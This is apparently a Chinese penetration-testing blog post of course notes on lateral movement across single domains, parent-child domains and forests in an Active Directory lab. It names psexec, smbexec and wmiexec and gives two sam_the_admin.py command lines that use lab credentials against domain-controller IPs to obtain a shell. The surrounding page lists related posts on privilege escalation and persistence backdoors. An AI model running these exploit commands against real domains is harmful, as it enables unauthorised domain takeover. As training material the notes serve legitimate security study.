EthanDoctor

内网对抗-横向移动篇&单域&父子域&域林&域森林&打点及信任&入口手法差异&思路方案

Ethan医生8个月前系统安全275

 横向移动-信息收集-单域&父子域&域森林

 横向移动-口令协议-单域&父子域&域森林

 横向移动-域控提权-单域&父子域&域森林

单域&父子域&域森林环境下:

1、多域信息收集差异

XDORG(xiaodi.org)

HRXRORG(hr.xiaodi.org)

HHRORG(h.hr.xiaodi.org)

GAXDORG(ga.xiaodi.org)

GGAORG(h.ga.xiaodi.org)

XIAODI8(xiaodi8.org)

 

2、口令协议横向移动差异(只要口令是对的 同网段所有的域机器都可以登入)

psexec smbexec wmiexec等

 

3、域控提权横向移动差异

python sam_the_admin.py hhrorg/'hhrpc:admin!@#45' -dc-ip 192.168.139.35 -shell

python sam_the_admin.py xdorg/'test:admin!@#45' -dc-ip 192.168.139.11 -shell

 

4、入口跳板机与打点及横向移动思路相呼应

场景1:入口机在h.hr.xiaodi.org下

场景2:入口机在hr.xiaodi.org下

场景2:入口机在xiaodi8.org下


标签: 横向移动篇
返回列表

上一篇:内网对抗-横向移动篇&域控系统提权&NetLogon&ADCS&PAC&KDC&永恒之蓝&CVE漏洞

下一篇:内网对抗-横向移动篇&工作组局域网&中间人攻击&ARP欺骗&DNS劫持&单双向&断网截获

相关文章

Windows权限提升篇&溢出漏洞&土豆家族&通杀全系&补丁对比&EXP筛选

Windows权限提升篇&溢出漏洞&土豆家族&通杀全系&补丁对比&EXP筛选

Web到Win-系统提权-人工操作如果提权中无法执行命令的话,可以尝试上传cmd.exe到可读写目录再调用优点:解决实时更新不集成的EXP缺点:操作繁琐,需要各种复现调试解决工具或插件无法实时更新,又...

内网对抗-横向移动篇&NTLM中继&Relay重放&SMB&EWS&LADP协议&强制认证&钓鱼监听

内网对抗-横向移动篇&NTLM中继&Relay重放&SMB&EWS&LADP协议&强制认证&钓鱼监听

➢ 横向移动-NTLM监听-Responder&Inveigh➢ 横向移动-NTLM条件-强制触发&被动钓鱼➢ 横向移动-NTLM中继-暴力破解&...

内网对抗-横向移动篇&WinRS命令&WinRM管理&RDP终端&密码喷射点&CrackMapExec

➢ 横向移动-WinRS&WinRM&RDP➢ 横向移动-密码喷射-CrackMapExec#WinRM&WinRSWinRM代表Windows远程管理,是...

Linux系统权限提升篇&Vulnhub&Rbash绕过&Docker&LXD镜像&History泄漏

➢ Linux系统提权-普通用户-LXD容器➢ Linux系统提权-普通用户-Docker容器➢ Linux系统提权-普通用户-Rbash绕过#应用场景:获取到Web权限...

内网对抗-权限维持篇&Linux系统&SSH协议&OpenSSH&PAM后门&软连接&密钥&后门账户

➢ 权限维持-Linux-SSH协议替换版本-OpenSSH后门➢ 权限维持-Linux-SSH协议更改验证-PAM启用替换➢ 权限维持-Linux-SSH协议登录方式-...

内网对抗-权限维持篇&内网AD域&SSP注入&DSRM还原后门&SID历史后门&Skeleton钥匙

➢ 权限维持-内网域-基于验证DLL加载-SSP➢ 权限维持-内网域-基于机制账号启用-DSRM➢ 权限维持-内网域-基于用户属性修改-SID-history➢ ...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Copyright Your hacksec.top Rights Reserved.

Powered By Z-BlogPHP. - 鄂ICP备2025099786号